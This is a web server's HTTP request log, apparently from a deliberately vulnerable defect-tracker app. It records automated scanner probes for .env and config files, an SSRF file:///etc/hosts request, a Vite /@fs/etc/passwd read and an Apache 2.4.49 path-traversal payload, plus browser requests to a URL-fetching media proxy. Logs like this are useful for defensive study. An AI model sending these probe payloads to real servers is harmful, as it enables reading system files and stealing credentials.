Path: /api/geojson
URL: /api/geojson?url=file:///etc/hosts
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60222
Query: import&raw??
Path: /@fs/etc/passwd
URL: /@fs/etc/passwd?import&raw??
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60214
Path: /telescope/requests
URL: /telescope/requests
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60200
Path: /.env.save
URL: /.env.save
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60194
Path: /api.json
URL: /api.json
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60186
Path: /Config.json
URL: /Config.json
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60170
Path: /info.php
URL: /info.php
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60168
Path: /server.py
URL: /server.py
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60154
Path: /.env
URL: /.env
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60148
Path: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
URL: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60146
Path: /.json
URL: /.json
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60144
Path: /server.js
URL: /server.js
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60140
Path: /api/v1/status
URL: /api/v1/status
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60128
Path: /.env.example
URL: /.env.example
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60122
Path: /.vscode/sftp.json
URL: /.vscode/sftp.json
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60118
Path: /README.md
URL: /README.md
Method: GET
[2026-03-20 19:12:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60106
Path: /main.js
URL: /main.js
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60100
Path: /main.py
URL: /main.py
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60094
Path: /.config
URL: /.config
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60078
Path: /.env.backup
URL: /.env.backup
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60072
Path: /docker-compose.override.yml
URL: /docker-compose.override.yml
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60064
Path: /phpinfo.php
URL: /phpinfo.php
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60054
Path: /server.go
URL: /server.go
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60042
Path: /idx_config/
URL: /idx_config/
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60034
Path: /.secret
URL: /.secret
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60026
Path: /.env.old
URL: /.env.old
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60020
Path: /dockerfile
URL: /dockerfile
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60006
Path: /docker-compose.yaml
URL: /docker-compose.yaml
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59996
Query: import&raw??
Path: /.env
URL: /.env?import&raw??
Method: GET
[2026-03-20 19:12:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59986
Path: /login.action
URL: /login.action
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59980
Path: /.env.local
URL: /.env.local
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59976
Path: /.env.production
URL: /.env.production
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59966
Path: /config.json
URL: /config.json
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59954
Path: /test.php
URL: /test.php
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59938
Path: /.DS_Store
URL: /.DS_Store
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
===================
User-Agent: Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59930
Path: /cgi-bin/../../../../../../../../../etc/hosts
URL: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
[2026-03-20 19:12:51] Main page accessed - IP: 168.100.9.75:59922
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 168.100.9.75:59922
Path: /
URL: /
Method: GET
[2026-03-20 19:12:51] === HTTP Request ===
[2026-03-20 18:50:11] Main page accessed - IP: 185.247.137.176:42441
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: gitlab.anzan.tech:8081
RemoteAddr: 185.247.137.176:42441
Path: /
URL: /
Method: GET
[2026-03-20 18:50:11] === HTTP Request ===
[2026-03-20 18:38:33] Defects page accessed - IP: 172.30.0.12:50380
===================
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50380
Path: /defects
URL: /defects
Method: GET
[2026-03-20 18:38:33] === HTTP Request ===
[2026-03-20 18:32:21] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:54072
===================
Cache-Control: no-cache
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Priority: u=4
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Pragma: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-20 18:32:21] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: */*
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Pragma: no-cache
Via: 2.0 Caddy
Te: trailers
Priority: u=4
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 18:32:21] === HTTP Request ===
[2026-03-20 18:32:07] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:54072
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
X-Forwarded-Proto: https
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Cookie: auth=sess_1774029942171781665; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-20 18:32:07] === HTTP Request ===
[2026-03-20 18:32:07] Defect detail page accessed - defect_id: 681a7a29-68b5-4c85-b15c-8b8462683d26, IP: 172.30.0.12:54072
===================
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=0
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
URL: /defects/681a7a29-68b5-4c85-b15c-8b8462683d26
Method: GET
[2026-03-20 18:32:07] === HTTP Request ===
[2026-03-20 18:32:02] Defects page accessed - IP: 172.30.0.12:54072
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept: */*
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects
URL: /defects
Method: GET
[2026-03-20 18:32:02] === HTTP Request ===
[2026-03-20 18:31:51] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:54072
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Via: 2.0 Caddy
Te: trailers
Priority: u=5, i
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Cookie: auth=sess_1774029942171781665; user_id=1
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-20 18:31:51] === HTTP Request ===
[2026-03-20 18:31:51] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:54072
===================
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=4
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Dest: empty
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-20 18:31:51] === HTTP Request ===
[2026-03-20 18:31:50] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:54072
===================
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-20 18:31:50] === HTTP Request ===
[2026-03-20 18:31:38] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:54072
===================
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Dest: image
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Priority: u=4, i
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Te: trailers
Cookie: auth=sess_1774029942171781665; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-20 18:31:38] === HTTP Request ===
[2026-03-20 18:31:38] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:54072
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Priority: u=0
Accept: */*
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-20 18:31:38] === HTTP Request ===
[2026-03-20 18:31:15] Defects page accessed - IP: 172.30.0.12:54072
===================
Sec-Fetch-Dest: empty
Accept: */*
Te: trailers
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects
URL: /defects
Method: GET
[2026-03-20 18:31:15] === HTTP Request ===
[2026-03-20 18:31:04] Media proxy request - url: https://media.vulnberries.ru/media?filename=2, IP: 172.30.0.12:54072
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
If-Modified-Since: Wed, 04 Mar 2026 14:43:21 GMT
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Mode: cors
Priority: u=4
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Method: GET
[2026-03-20 18:31:04] === HTTP Request ===
[2026-03-20 18:31:04] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:54072
===================
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Priority: u=0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54072
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-20 18:31:04] === HTTP Request ===
[2026-03-20 18:28:31] Defects page accessed - IP: 172.30.0.12:39090
===================
Te: trailers
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
Priority: u=0
Cookie: auth=sess_1774029942171781665; user_id=1
Accept: */*
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39090
Path: /defects
URL: /defects
Method: GET
[2026-03-20 18:28:31] === HTTP Request ===
[2026-03-20 18:28:26] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:39090
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Priority: u=4
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-For: 79.139.135.199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
If-Modified-Since: Thu, 19 Mar 2026 16:40:12 GMT
Cookie: auth=sess_1774029942171781665; user_id=1
Accept: */*
Te: trailers
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39090
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-20 18:28:26] === HTTP Request ===
[2026-03-20 18:28:26] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:39090
===================
Te: trailers
Priority: u=5, i
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774029942171781665; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: image
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39090
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-20 18:28:26] === HTTP Request ===
[2026-03-20 18:28:26] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:39090
===================
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Site: same-origin
Priority: u=0
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39090
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-20 18:28:26] === HTTP Request ===
[2026-03-20 18:28:22] Defects page accessed - IP: 172.30.0.12:39090
===================
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774029942171781665; user_id=1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39090
Path: /defects
URL: /defects
Method: GET
